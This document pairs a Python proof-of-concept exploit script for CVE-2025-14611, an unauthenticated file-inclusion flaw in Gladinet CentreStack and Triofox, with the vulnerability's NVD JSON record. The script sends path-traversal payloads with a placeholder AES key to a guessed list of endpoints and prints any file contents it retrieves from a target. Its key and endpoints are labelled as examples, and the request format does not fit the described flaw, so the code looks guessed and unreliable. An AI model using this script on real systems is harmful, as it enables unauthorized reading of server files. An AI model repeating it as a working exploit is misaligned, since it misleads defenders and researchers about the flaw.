CVE-2025-14611

import requests import sys # CVE-2025-14611 PoC - Gladinet CentreStack/Triofox Unauthenticated LFI # Target: Gladinet CentreStack or Triofox < 16.12.10420.56791 def exploit_lfi(target_url, filename='/etc/passwd'): """ Exploit local file inclusion via hardcoded AES key vulnerability """ # Hardcoded AES key used in vulnerable versions aes_key = "5A3E7F9B2C1D4E6F8A0B3C5D7E9F1A2B" # Example hardcoded key pattern # Target endpoint commonly affected endpoints = [ '/api/file/read', '/api/download', '/FileHandler.ashx', '/WebDAV/', '/api/v1/file' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json' } for endpoint in endpoints: try: # Construct LFI payload - path traversal payload = { 'path': f'../../../../../../{filename}', 'encrypted': True, 'key': aes_key } url = target_url.rstrip('/') + endpoint response = requests.post(url, json=payload, headers=headers, timeout=10, verify=False) if response.status_code == 200 and any(x in response.text for x in ['root:', 'Administrator', '<?xml', '<configuration']): print(f'[+] VULNERABLE: {url}') print(f'[+] File content preview:') print(response.text[:500]) return True except requests.exceptions.RequestException: continue print('[-] Target may not be vulnerable or not reachable') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-14611.py <target_url>') print('Example: python cve-2025-14611.py https://victim.com') sys.exit(1) target = sys.argv[1] exploit_lfi(target)

{"cve": {"id": "CVE-2025-14611", "sourceIdentifier": "5dacb0b8-2277-4717-899c-254586fe4912", "published": "2025-12-12T21:15:53.107", "lastModified": "2025-12-16T13:48:02.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise."}], "metrics": {"cvssMetricV40": [{"source": "5dacb0b8-2277-4717-899c-254586fe4912", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "ATTACKED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-15", "cisaActionDue": "2026-01-05", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.12.10420.56791", "matchCriteriaId": "BBE25A56-77B1-415B-A1EB-186627ADF753"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.12.10420.56791", "matchCriteriaId": "4E01A5DF-260E-4838-9B8C-34F059079DC8"}]}]}], "references": [{"url": "https://www.huntress.com/blog/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability", "source": "5dacb0b8-2277-4717-899c-254586fe4912", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-14611", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}